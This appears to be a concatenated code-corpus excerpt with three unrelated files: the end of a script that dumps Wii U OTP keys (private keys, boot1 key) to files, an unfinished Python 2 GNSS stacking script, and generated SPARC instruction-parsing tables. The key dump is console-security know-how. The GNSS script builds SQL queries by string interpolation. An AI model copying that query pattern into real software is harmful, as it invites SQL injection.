keytxt.write("\n"+name+": " + binascii.hexlify(encryption_key_for_drh_wlan_data).decode('utf-8')+"\n")
name="04. Unknown (07)"
fi = open(targetfol+name+".bin", "wb")
fi.write(unknown_07_unused)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(unknown_07_unused).decode('utf-8')+"\n")
name="05. Wii U SLC (NAND) HMAC"
fi = open(targetfol+name+".bin", "wb")
fi.write(wiiu_slc_nand_hmac)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(wiiu_slc_nand_hmac).decode('utf-8')+"\n")
name="06. Unknown (08 - Padding)"
fi = open(targetfol+name+".bin", "wb")
fi.write(unknown_08_padding)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(unknown_08_padding).decode('utf-8')+"\n")
# 4. Wii U Bank
keytxt.write("\n 4. Wii U Bank\n")
targetfol=out4
name="01. Unknown (09)"
fi = open(targetfol+name+".bin", "wb")
fi.write(unknown_09_unused)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(unknown_09_unused).decode('utf-8')+"\n")
name="02. Unknown (10)"
fi = open(targetfol+name+".bin", "wb")
fi.write(unknown_10_unused)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(unknown_10_unused).decode('utf-8')+"\n")
name="03. Wii U NG ID"
fi = open(targetfol+name+".bin", "wb")
fi.write(wiiu_ng_id)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(wiiu_ng_id).decode('utf-8')+"\n")
name="04. Wii U NG Private Key"
fi = open(targetfol+name+".bin", "wb")
fi.write(wiiu_ng_private_key)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(wiiu_ng_private_key).decode('utf-8')+"\n")
name="05. Wii U private key for NSS device certificate"
fi = open(targetfol+name+".bin", "wb")
fi.write(wiiu_private_nss_device_cert_key)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(wiiu_private_nss_device_cert_key).decode('utf-8')+"\n")
name="06. Wii U RNG seed (only the first 0x04 bytes are used)"
fi = open(targetfol+name+".bin", "wb")
fi.write(wiiu_otp_rng_seed)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(wiiu_otp_rng_seed).decode('utf-8')+"\n")
name="07. Unknown (12)"
fi = open(targetfol+name+".bin", "wb")
fi.write(unknown_12_unused)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(unknown_12_unused).decode('utf-8')+"\n")
# 5. Wii U Bank
keytxt.write("\n 5. Wii U Bank\n")
targetfol=out5
name="01. Wii U root certificate MS ID"
fi = open(targetfol+name+".bin", "wb")
fi.write(wiiu_root_cert_ms_id_0x00000012)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(wiiu_root_cert_ms_id_0x00000012).decode('utf-8')+"\n")
name="02. Wii U root certificate CA ID"
fi = open(targetfol+name+".bin", "wb")
fi.write(wiiu_root_cert_ca_id_0x00000003)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(wiiu_root_cert_ca_id_0x00000003).decode('utf-8')+"\n")
name="03. Wii U root certificate NG key ID"
fi = open(targetfol+name+".bin", "wb")
fi.write(wiiu_root_cert_ng_key_id)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(wiiu_root_cert_ng_key_id).decode('utf-8')+"\n")
name="04. Wii U root certificate NG signature"
fi = open(targetfol+name+".bin", "wb")
fi.write(wiiu_root_cert_ng_signature)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(wiiu_root_cert_ng_signature).decode('utf-8')+"\n")
name="04. Unknown (14 - Unused)"
fi = open(targetfol+name+".bin", "wb")
fi.write(unknown_14_unused)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(unknown_14_unused).decode('utf-8')+"\n")
name="05. Unknown (locked out by boot1)"
fi = open(targetfol+name+".bin", "wb")
fi.write(unknown_15_locked_by_boot1)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(unknown_15_locked_by_boot1).decode('utf-8')+"\n")
# 7. Misc Bank
keytxt.write("\n 7. Wii U Bank\n")
targetfol=out7
name="01. Unknown (locked by boot1)"
fi = open(targetfol+name+".bin", "wb")
fi.write(boot1_locked_unknown_01)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(boot1_locked_unknown_01).decode('utf-8')+"\n")
name="02. boot1 key (locked by boot0)"
fi = open(targetfol+name+".bin", "wb")
fi.write(boot1_key_locked_by_b0)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(boot1_key_locked_by_b0).decode('utf-8')+"\n")
name="03. Unknown (locked out by boot0, not used)"
fi = open(targetfol+name+".bin", "wb")
fi.write(boot0_locked_unused_01)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(boot0_locked_unused_01).decode('utf-8')+"\n")
name="04. Empty 1"
fi = open(targetfol+name+".bin", "wb")
fi.write(misc_empty1)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(misc_empty1).decode('utf-8')+"\n")
name="05. Empty 2"
fi = open(targetfol+name+".bin", "wb")
fi.write(misc_empty2)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(misc_empty2).decode('utf-8')+"\n")
name="06. OTP Version and Revision"
fi = open(targetfol+name+".bin", "wb")
fi.write(otp_date_code)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(otp_date_code).decode('utf-8')+"\n")
name="07. OTP Date Code"
fi = open(targetfol+name+".bin", "wb")
fi.write(otp_version_and_revision)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(otp_version_and_revision).decode('utf-8')+"\n")
name="08. OTP Version Name String"
fi = open(targetfol+name+".bin", "wb")
fi.write(otp_version_name_string)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(otp_version_name_string).decode('utf-8')+"\n")
name="09. Empty 3"
fi = open(targetfol+name+".bin", "wb")
fi.write(misc_empty3)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(misc_empty3).decode('utf-8')+"\n")
name="10. JTAG status"
fi = open(targetfol+name+".bin", "wb")
fi.write(jtag_status)
fi.close()
keytxt.write("\n"+name+": " + binascii.hexlify(jtag_status).decode('utf-8')+"\n")
#End file output
| mit | -5,033,038,418,475,891,000 | 29.374525 | 174 | 0.646304 | false |
demiangomez/Parallel.GAMIT | stacker/pyNEQStack.py | 1 | 6703 | """
Project: Parallel.Stacker
Date: 6/12/18 10:28 AM
Author: Demian D. Gomez
"""
import dbConnection
import pyOptions
import argparse
import pyETM
import pyJobServer
import numpy
import pyDate
from pyDate import Date
from tqdm import tqdm
import traceback
from pprint import pprint
import os
import numpy as np
from scipy.stats import chi2
from Utils import process_date
from Utils import ct2lg
from Utils import ecef2lla
from Utils import rotct2lg
LIMIT = 2.5
def adjust_lsq(A, L, P=None):
cst_pass = False
iteration = 0
factor = 1
So = 1
dof = (A.shape[0] - A.shape[1])
X1 = chi2.ppf(1 - 0.05 / 2, dof)
X2 = chi2.ppf(0.05 / 2, dof)
s = np.array([])
v = np.array([])
C = np.array([])
if P is None:
P = np.ones((A.shape[0]))
while not cst_pass and iteration <= 10:
W = np.sqrt(P)
Aw = np.multiply(W[:, None], A)
Lw = np.multiply(W, L)
C = np.linalg.lstsq(Aw, Lw, rcond=-1)[0]
v = L - np.dot(A, C)
# unit variance
So = np.sqrt(np.dot(v, np.multiply(P, v)) / dof)
x = np.power(So, 2) * dof
# obtain the overall uncertainty predicted by lsq
factor = factor * So
# calculate the normalized sigmas
s = np.abs(np.divide(v, factor))
if x < X2 or x > X1:
# if it falls in here it's because it didn't pass the Chi2 test
cst_pass = False
# reweigh by Mike's method of equal weight until 2 sigma
f = np.ones((v.shape[0],))
sw = np.power(10, LIMIT - s[s > LIMIT])
sw[sw < np.finfo(np.float).eps] = np.finfo(np.float).eps
f[s > LIMIT] = sw
P = np.square(np.divide(f, factor))
else:
cst_pass = True
iteration += 1
# some statistics
SS = np.linalg.inv(np.dot(A.transpose(), np.multiply(P[:, None], A)))
sigma = So * np.sqrt(np.diag(SS))
# mark observations with sigma <= LIMIT
index = s <= LIMIT
return C, sigma, index, v, factor, P, iteration
def sql_select_union(project, fields, date1, date2, stn_filter=None):
ff = []
for f in fields.split(','):
if f.strip() not in ('0', '1'):
if '-' in f.strip():
ff.append('-g2.' + f.strip().replace('-', ''))
else:
ff.append('g2.' + f.strip())
else:
ff.append(f.strip())
fields = ','.join(ff)
if stn_filter:
for stn in stn_filter:
where = ' AND g1."NetworkCode" || \'.\' || g1."StationCode" IN (\'' + '\',\''.join(stn_filter) + '\')'
else:
where = ''
sql = '''SELECT %s from gamit_soln g1
LEFT JOIN gamit_soln g2 on
g1."NetworkCode" = g2."NetworkCode" and
g1."StationCode" = g2."StationCode" and
g1."Project" = g2."Project" and
g1."Year" = %i and
g1."DOY" = %i and
g2."Year" = %i and
g2."DOY" = %i
WHERE g1."Year" = %i and g1."DOY" = %i AND g2."Year" IS NOT NULL
AND g1."Project" = \'%s\' %s ORDER BY g2."NetworkCode", g2."StationCode"''' % \
(fields, date1.year, date1.doy, date2.year, date2.doy, date1.year, date1.doy, project, where)
return sql
def sql_select(project, fields, date2):
sql = '''SELECT %s from gamit_soln
WHERE "Project" = \'%s\' AND "Year" = %i AND "DOY" = %i
ORDER BY "NetworkCode", "StationCode"''' % (fields, project, date2.year, date2.doy)
return sql
def rotate_sigmas(ecef, lat, lon):
R = rotct2lg(lat, lon)
sd = np.diagflat(ecef)
sneu = np.dot(np.dot(R[:, :, 0], sd), R[:, :, 0].transpose())
dneu = np.diag(sneu)
return dneu
def dra(cnn, project, dates):
rs = cnn.query('SELECT "NetworkCode", "StationCode" FROM gamit_soln '
'WHERE "Project" = \'%s\' AND "FYear" BETWEEN %.4f AND %.4f GROUP BY "NetworkCode", "StationCode" '
'ORDER BY "NetworkCode", "StationCode"' % (project, dates[0].fyear, dates[1].fyear))
stnlist = rs.dictresult()
# get the epochs
ep = cnn.query('SELECT "Year", "DOY" FROM gamit_soln '
'WHERE "Project" = \'%s\' AND "FYear" BETWEEN %.4f AND %.4f'
'GROUP BY "Year", "DOY" ORDER BY "Year", "DOY"' % (project, dates[0].fyear, dates[1].fyear))
ep = ep.dictresult()
epochs = [Date(year=item['Year'], doy=item['DOY']) for item in ep]
A = np.array([])
Ax = []
Ay = []
Az = []
for station in stnlist:
print 'stacking %s.%s' % (station['NetworkCode'], station['StationCode'])
try:
etm = pyETM.GamitETM(cnn, station['NetworkCode'], station['StationCode'], project=project)
except Exception as e:
print " Exception: " + str(e)
continue
x = etm.soln.x
y = etm.soln.y
z = etm.soln.z
Ax.append(np.array([np.zeros(x.shape), -z, y, np.ones(x.shape), np.zeros(x.shape), np.zeros(x.shape)]).transpose())
Ay.append(np.array([z, np.zeros(x.shape), -x, np.zeros(x.shape), np.ones(x.shape), np.zeros(x.shape)]).transpose())
Az.append(np.array([-y, x, np.zeros(x.shape), np.zeros(x.shape), np.zeros(x.shape), np.ones(x.shape)]).transpose())
x = np.column_stack((Ax, etm.A, np.zeros(etm.A.shape), np.zeros(etm.A.shape)))
y = np.column_stack((Ay, np.zeros(etm.A.shape), etm.A, np.zeros(etm.A.shape)))
z = np.column_stack((Az, np.zeros(etm.A.shape), np.zeros(etm.A.shape), etm.A))
A = np.row_stack((x, y, z))
def main():
parser = argparse.ArgumentParser(description='GNSS time series stacker')
parser.add_argument('project', type=str, nargs=1, metavar='{project name}',
help="Specify the project name used to process the GAMIT solutions in Parallel.GAMIT.")
parser.add_argument('-d', '--date_filter', nargs='+', metavar='date',
help='Date range filter Can be specified in yyyy/mm/dd yyyy_doy wwww-d format')
args = parser.parse_args()
cnn = dbConnection.Cnn("gnss_data.cfg")
Config = pyOptions.ReadOptions("gnss_data.cfg") # type: pyOptions.ReadOptions
# create the execution log
dates = [pyDate.Date(year=1980, doy=1), pyDate.Date(year=2100, doy=1)]
try:
dates = process_date(args.date_filter)
except ValueError as e:
parser.error(str(e))
# create folder for plots
if not os.path.isdir(args.project[0]):
os.makedirs(args.project[0])
########################################
# load polyhedrons
project = dra(cnn, args.project[0], dates)
if __name__ == '__main__':
main() | gpl-3.0 | -5,775,745,574,475,761,000 | 27.52766 | 123 | 0.556766 | false |
knz/slcore | slc/tools/slc/mt/mtsparc/asmproc/opc/mtsparc.py | 1 | 38790 | # This file was generated by decode.py. Do not edit!
# For each instruction the information available is:'
# re_parser, input_regs, output_regs, double_regs, long_latency, delayed, extra_phy_inputs, extra_phy_outputs'
import re
class insn_metadata(object):
def __init__(self, info):
self.inputs, self.outputs, self.double_regs, self.long_latency, self.delayed, self.extra_inputs, self.extra_outputs, self.immediates, self.is_branch, self.is_condbranch = info
reg = r"""(\$[lgsd]?f?\d+|%(?:sp|fp|[ilog][0-7]|[rf]\d+))"""
imm = r"""([^%$]\S*|%(?:(?:hi|lo)x?|hh|hm|lm|h44|m44|uhi|ulo|(?:tgd|tldm|tie)_(?:hi22|lo10)|(?:tldo|tle)_(?:hix22|lox10))\([^)]+\))"""
re000 = re.compile(r'''\s*''' + imm + r'''\s*$''')
re001 = re.compile(r'''\s*''' + reg + r'''\s*,\s*''' + reg + r'''\s*,\s*''' + reg + r'''\s*$''')
re002 = re.compile(r'''\s*$''')
re003 = re.compile(r'''\s*''' + reg + r'''\s*,\s*''' + imm + r'''\s*,\s*''' + reg + r'''\s*$''')
re004 = re.compile(r'''\s*\[\s*''' + reg + r'''\s*[+-]\s*''' + reg + r'''\s*\]\s*(\dx(\d|[a-f])+|\d+)\s*,\s*''' + reg + r'''\s*$''')
re005 = re.compile(r'''\s*\[\s*''' + reg + r'''\s*\]\s*(\dx(\d|[a-f])+|\d+)\s*,\s*''' + reg + r'''\s*$''')
re006 = re.compile(r'''\s*(?:)\s*''' + imm + r'''\s*,\s*''' + reg + r'''\s*$''')
re007 = re.compile(r'''\s*\[\s*''' + reg + r'''\s*[+-]\s*''' + reg + r'''\s*\]\s*,\s*''' + reg + r'''\s*$''')
re008 = re.compile(r'''\s*\[\s*''' + reg + r'''\s*\]\s*,\s*''' + reg + r'''\s*$''')
re009 = re.compile(r'''\s*\[\s*''' + reg + r'''\s*[+-]\s*''' + imm + r'''\s*\]\s*,\s*''' + reg + r'''\s*$''')
re010 = re.compile(r'''\s*\[\s*''' + imm + r'''\s*[+-]\s*''' + reg + r'''\s*\]\s*,\s*''' + reg + r'''\s*$''')
re011 = re.compile(r'''\s*\[\s*''' + imm + r'''\s*\]\s*,\s*''' + reg + r'''\s*$''')
re012 = re.compile(r'''\s*\[\s*''' + reg + r'''\s*[+-]\s*''' + reg + r'''\s*\]\s*,\s*%c\d+\S*\s*$''')
re013 = re.compile(r'''\s*\[\s*''' + reg + r'''\s*\]\s*,\s*%c\d+\S*\s*$''')
re014 = re.compile(r'''\s*\[\s*''' + reg + r'''\s*[+-]\s*''' + imm + r'''\s*\]\s*,\s*%c\d+\S*\s*$''')
re015 = re.compile(r'''\s*\[\s*''' + imm + r'''\s*[+-]\s*''' + reg + r'''\s*\]\s*,\s*%c\d+\S*\s*$''')
re016 = re.compile(r'''\s*\[\s*''' + imm + r'''\s*\]\s*,\s*%c\d+\S*\s*$''')
re017 = re.compile(r'''\s*''' + reg + r'''\s*,\s*''' + reg + r'''\s*$''')
re018 = re.compile(r'''\s*''' + reg + r'''\s*$''')
re019 = re.compile(r'''\s*''' + imm + r'''\s*,\s*''' + reg + r'''\s*,\s*''' + reg + r'''\s*$''')
re020 = re.compile(r'''\s*''' + imm + r'''\s*,\s*''' + reg + r'''\s*$''')
re021 = re.compile(r'''\s*\[\s*''' + reg + r'''\s*[+-]\s*''' + reg + r'''\s*\]\s*,\s*%fsr\S*\s*$''')
re022 = re.compile(r'''\s*\[\s*''' + reg + r'''\s*\]\s*,\s*%fsr\S*\s*$''')
re023 = re.compile(r'''\s*\[\s*''' + reg + r'''\s*[+-]\s*''' + imm + r'''\s*\]\s*,\s*%fsr\S*\s*$''')
re024 = re.compile(r'''\s*\[\s*''' + imm + r'''\s*[+-]\s*''' + reg + r'''\s*\]\s*,\s*%fsr\S*\s*$''')
re025 = re.compile(r'''\s*\[\s*''' + imm + r'''\s*\]\s*,\s*%fsr\S*\s*$''')
re026 = re.compile(r'''\s*\[\s*''' + reg + r'''\s*[+-]\s*''' + reg + r'''\s*\]\s*,\s*%csr\S*\s*$''')
re027 = re.compile(r'''\s*\[\s*''' + reg + r'''\s*\]\s*,\s*%csr\S*\s*$''')
re028 = re.compile(r'''\s*\[\s*''' + reg + r'''\s*[+-]\s*''' + imm + r'''\s*\]\s*,\s*%csr\S*\s*$''')
re029 = re.compile(r'''\s*\[\s*''' + imm + r'''\s*[+-]\s*''' + reg + r'''\s*\]\s*,\s*%csr\S*\s*$''')
re030 = re.compile(r'''\s*\[\s*''' + imm + r'''\s*\]\s*,\s*%csr\S*\s*$''')
re031 = re.compile(r'''\s*''' + reg + r'''\s*,\s*''' + imm + r'''\s*$''')
re032 = re.compile(r'''\s*''' + reg + r'''\s*,\s*''' + reg + r'''\s*,\s*%asr\S*\s*$''')
re033 = re.compile(r'''\s*''' + reg + r'''\s*,\s*''' + imm + r'''\s*,\s*%asr\S*\s*$''')
re034 = re.compile(r'''\s*''' + reg + r'''\s*,\s*''' + reg + r'''\s*,\s*%y\S*\s*$''')
re035 = re.compile(r'''\s*''' + reg + r'''\s*,\s*''' + imm + r'''\s*,\s*%y\S*\s*$''')
re036 = re.compile(r'''\s*''' + reg + r'''\s*,\s*''' + reg + r'''\s*,\s*%psr\S*\s*$''')
re037 = re.compile(r'''\s*''' + reg + r'''\s*,\s*''' + imm + r'''\s*,\s*%psr\S*\s*$''')
re038 = re.compile(r'''\s*''' + reg + r'''\s*,\s*''' + reg + r'''\s*,\s*%wim\S*\s*$''')
re039 = re.compile(r'''\s*''' + reg + r'''\s*,\s*''' + imm + r'''\s*,\s*%wim\S*\s*$''')
re040 = re.compile(r'''\s*''' + reg + r'''\s*,\s*''' + reg + r'''\s*,\s*%tbr\S*\s*$''')
re041 = re.compile(r'''\s*''' + reg + r'''\s*,\s*''' + imm + r'''\s*,\s*%tbr\S*\s*$''')
re042 = re.compile(r'''\s*%asr\d+\S*\s*,\s*''' + reg + r'''\s*$''')
re043 = re.compile(r'''\s*%y\S*\s*,\s*''' + reg + r'''\s*$''')
re044 = re.compile(r'''\s*%psr\S*\s*,\s*''' + reg + r'''\s*$''')
re045 = re.compile(r'''\s*%wim\S*\s*,\s*''' + reg + r'''\s*$''')
re046 = re.compile(r'''\s*%tbr\S*\s*,\s*''' + reg + r'''\s*$''')
re047 = re.compile(r'''\s*''' + reg + r'''\s*,\s*%asr\S*\s*$''')
re048 = re.compile(r'''\s*''' + imm + r'''\s*,\s*%asr\S*\s*$''')
re049 = re.compile(r'''\s*''' + reg + r'''\s*,\s*%y\S*\s*$''')
re050 = re.compile(r'''\s*''' + imm + r'''\s*,\s*%y\S*\s*$''')
re051 = re.compile(r'''\s*''' + reg + r'''\s*,\s*%psr\S*\s*$''')
re052 = re.compile(r'''\s*''' + imm + r'''\s*,\s*%psr\S*\s*$''')
re053 = re.compile(r'''\s*''' + reg + r'''\s*,\s*%wim\S*\s*$''')
re054 = re.compile(r'''\s*''' + imm + r'''\s*,\s*%wim\S*\s*$''')
re055 = re.compile(r'''\s*''' + reg + r'''\s*,\s*%tbr\S*\s*$''')
re056 = re.compile(r'''\s*''' + imm + r'''\s*,\s*%tbr\S*\s*$''')
re057 = re.compile(r'''\s*''' + reg + r'''\s*,\s*\[\s*''' + reg + r'''\s*[+-]\s*''' + reg + r'''\s*\]\s*$''')
re058 = re.compile(r'''\s*''' + reg + r'''\s*,\s*\[\s*''' + reg + r'''\s*\]\s*$''')
re059 = re.compile(r'''\s*''' + reg + r'''\s*,\s*\[\s*''' + reg + r'''\s*[+-]\s*''' + imm + r'''\s*\]\s*$''')
re060 = re.compile(r'''\s*''' + reg + r'''\s*,\s*\[\s*''' + imm + r'''\s*[+-]\s*''' + reg + r'''\s*\]\s*$''')
re061 = re.compile(r'''\s*''' + reg + r'''\s*,\s*\[\s*''' + imm + r'''\s*\]\s*$''')
re062 = re.compile(r'''\s*%c\d+\S*\s*,\s*\[\s*''' + reg + r'''\s*[+-]\s*''' + reg + r'''\s*\]\s*$''')
re063 = re.compile(r'''\s*%c\d+\S*\s*,\s*\[\s*''' + reg + r'''\s*\]\s*$''')
re064 = re.compile(r'''\s*%c\d+\S*\s*,\s*\[\s*''' + reg + r'''\s*[+-]\s*''' + imm + r'''\s*\]\s*$''')
re065 = re.compile(r'''\s*%c\d+\S*\s*,\s*\[\s*''' + imm + r'''\s*[+-]\s*''' + reg + r'''\s*\]\s*$''')
re066 = re.compile(r'''\s*%c\d+\S*\s*,\s*\[\s*''' + imm + r'''\s*\]\s*$''')
re067 = re.compile(r'''\s*%csr\S*\s*,\s*\[\s*''' + reg + r'''\s*[+-]\s*''' + reg + r'''\s*\]\s*$''')
re068 = re.compile(r'''\s*%csr\S*\s*,\s*\[\s*''' + reg + r'''\s*\]\s*$''')
re069 = re.compile(r'''\s*%csr\S*\s*,\s*\[\s*''' + reg + r'''\s*[+-]\s*''' + imm + r'''\s*\]\s*$''')
re070 = re.compile(r'''\s*%csr\S*\s*,\s*\[\s*''' + imm + r'''\s*[+-]\s*''' + reg + r'''\s*\]\s*$''')
re071 = re.compile(r'''\s*%csr\S*\s*,\s*\[\s*''' + imm + r'''\s*\]\s*$''')
re072 = re.compile(r'''\s*%fsr\S*\s*,\s*\[\s*''' + reg + r'''\s*[+-]\s*''' + reg + r'''\s*\]\s*$''')
re073 = re.compile(r'''\s*%fsr\S*\s*,\s*\[\s*''' + reg + r'''\s*\]\s*$''')
re074 = re.compile(r'''\s*%fsr\S*\s*,\s*\[\s*''' + reg + r'''\s*[+-]\s*''' + imm + r'''\s*\]\s*$''')
re075 = re.compile(r'''\s*%fsr\S*\s*,\s*\[\s*''' + imm + r'''\s*[+-]\s*''' + reg + r'''\s*\]\s*$''')
re076 = re.compile(r'''\s*%fsr\S*\s*,\s*\[\s*''' + imm + r'''\s*\]\s*$''')
re077 = re.compile(r'''\s*\[\s*''' + reg + r'''\s*[+-]\s*''' + reg + r'''\s*\]\s*$''')
re078 = re.compile(r'''\s*\[\s*''' + reg + r'''\s*\]\s*$''')
re079 = re.compile(r'''\s*\[\s*''' + reg + r'''\s*[+-]\s*''' + imm + r'''\s*\]\s*$''')
re080 = re.compile(r'''\s*\[\s*''' + imm + r'''\s*[+-]\s*''' + reg + r'''\s*\]\s*$''')
re081 = re.compile(r'''\s*\[\s*''' + imm + r'''\s*\]\s*$''')
re082 = re.compile(r'''\s*''' + reg + r'''\s*,\s*\[\s*''' + reg + r'''\s*[+-]\s*''' + reg + r'''\s*\]\s*(\dx(\d|[a-f])+|\d+)\s*$''')
re083 = re.compile(r'''\s*''' + reg + r'''\s*,\s*\[\s*''' + reg + r'''\s*\]\s*(\dx(\d|[a-f])+|\d+)\s*$''')
re084 = re.compile(r'''\s*''' + reg + r'''\s*[+-]\s*''' + reg + r'''\s*,\s*''' + reg + r'''\s*$''')
re085 = re.compile(r'''\s*''' + reg + r'''\s*[+-]\s*''' + imm + r'''\s*,\s*''' + reg + r'''\s*$''')
re086 = re.compile(r'''\s*''' + imm + r'''\s*[+-]\s*''' + reg + r'''\s*,\s*''' + reg + r'''\s*$''')
re087 = re.compile(r'''\s*''' + reg + r'''\s*[+-]\s*''' + reg + r'''\s*$''')
re088 = re.compile(r'''\s*''' + reg + r'''\s*[+-]\s*''' + imm + r'''\s*$''')
re089 = re.compile(r'''\s*''' + imm + r'''\s*[+-]\s*''' + reg + r'''\s*$''')
re090 = re.compile(r'''\s*''' + reg + r'''\s*,\s*''' + reg + r'''\s*,\s*''' + imm + r'''\s*$''')
re091 = re.compile(r'''\s*''' + imm + r'''\s*,\s*\d+\s*$''')
re092 = re.compile(r'''\s*''' + reg + r'''\s*[+-]\s*''' + reg + r'''\s*,\s*\d+\s*$''')
re093 = re.compile(r'''\s*''' + reg + r'''\s*,\s*\d+\s*$''')
re094 = re.compile(r'''\s*''' + reg + r'''\s*[+-]\s*''' + imm + r'''\s*,\s*\d+\s*$''')
re095 = re.compile(r'''\s*''' + imm + r'''\s*[+-]\s*''' + reg + r'''\s*,\s*\d+\s*$''')
re096 = re.compile(r'''\s*%fq\S*\s*,\s*\[\s*''' + reg + r'''\s*[+-]\s*''' + reg + r'''\s*\]\s*$''')
re097 = re.compile(r'''\s*%fq\S*\s*,\s*\[\s*''' + reg + r'''\s*\]\s*$''')
re098 = re.compile(r'''\s*%fq\S*\s*,\s*\[\s*''' + reg + r'''\s*[+-]\s*''' + imm + r'''\s*\]\s*$''')
re099 = re.compile(r'''\s*%fq\S*\s*,\s*\[\s*''' + imm + r'''\s*[+-]\s*''' + reg + r'''\s*\]\s*$''')
re100 = re.compile(r'''\s*%fq\S*\s*,\s*\[\s*''' + imm + r'''\s*\]\s*$''')
re101 = re.compile(r'''\s*%cq\S*\s*,\s*\[\s*''' + reg + r'''\s*[+-]\s*''' + reg + r'''\s*\]\s*$''')
re102 = re.compile(r'''\s*%cq\S*\s*,\s*\[\s*''' + reg + r'''\s*\]\s*$''')
re103 = re.compile(r'''\s*%cq\S*\s*,\s*\[\s*''' + reg + r'''\s*[+-]\s*''' + imm + r'''\s*\]\s*$''')
re104 = re.compile(r'''\s*%cq\S*\s*,\s*\[\s*''' + imm + r'''\s*[+-]\s*''' + reg + r'''\s*\]\s*$''')
re105 = re.compile(r'''\s*%cq\S*\s*,\s*\[\s*''' + imm + r'''\s*\]\s*$''')
re106 = re.compile(r'''\s*%wim\S*\s*,\s*''' + imm + r'''\s*,\s*''' + reg + r'''\s*$''')
form000 = insn_metadata(([], [], [], False, True, [], [], [0], False, True))
form001 = insn_metadata(([0, 1], [2], [], False, False, [], [], [], False, False))
form002 = insn_metadata(([], [], [], False, False, [], [], [], False, False))
form003 = insn_metadata(([0], [2], [], False, False, [], [], [1], False, False))
form004 = insn_metadata(([0, 1], [2], [], True, False, [], [], [], False, False))
form005 = insn_metadata(([0], [1], [], True, False, [], [], [], False, False))
form006 = insn_metadata(([], [1], [], False, False, [], [], [0], False, False))
form007 = insn_metadata(([0, 1], [2], [2], True, False, [], [], [], False, False))
form008 = insn_metadata(([0], [1], [1], True, False, [], [], [], False, False))
form009 = insn_metadata(([0], [2], [2], True, False, [], [], [1], False, False))
form010 = insn_metadata(([1], [2], [2], True, False, [], [], [0], False, False))
form011 = insn_metadata(([], [1], [1], True, False, [], [], [0], False, False))
form012 = insn_metadata(([0, 1], [], [], True, False, [], [], [], False, False))
form013 = insn_metadata(([0], [], [], True, False, [], [], [], False, False))
form014 = insn_metadata(([0], [], [], True, False, [], [], [1], False, False))
form015 = insn_metadata(([1], [], [], True, False, [], [], [0], False, False))
form016 = insn_metadata(([], [], [], True, False, [], [], [0], False, False))
form017 = insn_metadata(([0], [1], [], False, False, [], [], [], False, False))
form018 = insn_metadata(([], [0], [], False, False, [], [], [], False, False))
form019 = insn_metadata(([0, 1], [2], [0, 1, 2], True, False, [], [], [], False, False))
form020 = insn_metadata(([1], [2], [], False, False, [], [], [0], False, False))
form021 = insn_metadata(([0, 1], [], [0], False, False, [], [], [], False, False))
form022 = insn_metadata(([0, 1], [1], [], False, False, [], [], [], False, False))
form023 = insn_metadata(([1], [1], [], False, False, [], [], [0], False, False))
form024 = insn_metadata(([0], [2], [], True, False, [], [], [1], False, False))
form025 = insn_metadata(([1], [2], [], True, False, [], [], [0], False, False))
form026 = insn_metadata(([], [1], [], True, False, [], [], [0], False, False))
form027 = insn_metadata(([0], [], [], False, False, [], [], [], False, False))
form028 = insn_metadata(([], [0], [], True, False, [], [], [], False, False))
form029 = insn_metadata(([0, 1], [2], [1, 2], True, False, [], [], [], False, False))
form030 = insn_metadata(([0, 1], [], [], False, False, [], [], [], False, False))
form031 = insn_metadata(([0], [], [], False, False, [], [], [1], False, False))
form032 = insn_metadata(([], [], [], False, False, [], [], [0], False, False))
form033 = insn_metadata(([0], [1], [0, 1], True, False, [], [], [], False, False))
form034 = insn_metadata(([0, 1], [2], [], True, False, [], ['y'], [], False, False))
form035 = insn_metadata(([0], [2], [], True, False, [], ['y'], [1], False, False))
form036 = insn_metadata(([1], [2], [], True, False, [], ['y'], [0], False, False))
form037 = insn_metadata(([0, 1, 2], [], [], False, False, [], [], [], False, False))
form038 = insn_metadata(([0, 1], [], [], False, False, [], [], [2], False, False))
form039 = insn_metadata(([0, 2], [], [], False, False, [], [], [1], False, False))
form040 = insn_metadata(([1], [], [], False, False, [], [], [0], False, False))
form041 = insn_metadata(([0], [0], [], False, False, [], [], [], False, False))
form042 = insn_metadata(([0, 1], [], [0, 1], True, False, [], [], [], False, False))
form043 = insn_metadata(([0, 1], [2], [], True, False, ['y'], [], [], False, False))
form044 = insn_metadata(([0], [2], [], True, False, ['y'], [], [1], False, False))
form045 = insn_metadata(([1], [2], [], True, False, ['y'], [], [0], False, False))
form046 = insn_metadata(([0, 1], [2], [], False, True, [], [], [], True, False))
form047 = insn_metadata(([0], [1], [], False, True, [], [], [], True, False))
form048 = insn_metadata(([], [1], [], False, True, [], [], [0], True, False))
form049 = insn_metadata(([0], [2], [], False, True, [], [], [1], True, False))
form050 = insn_metadata(([1], [2], [], False, True, [], [], [0], True, False))
form051 = insn_metadata(([0], [1], [1], False, False, [], [], [], False, False))
form052 = insn_metadata(([], [], [], False, True, [], [], [0], True, False))
form053 = insn_metadata(([0, 1, 2], [], [0], False, False, [], [], [], False, False))
form054 = insn_metadata(([0], [1], [0], False, False, [], [], [], False, False))
form055 = insn_metadata(([], [], [], False, True, [15], [], [], True, False))
form056 = insn_metadata(([], [], [], True, False, [], [], [], False, False))
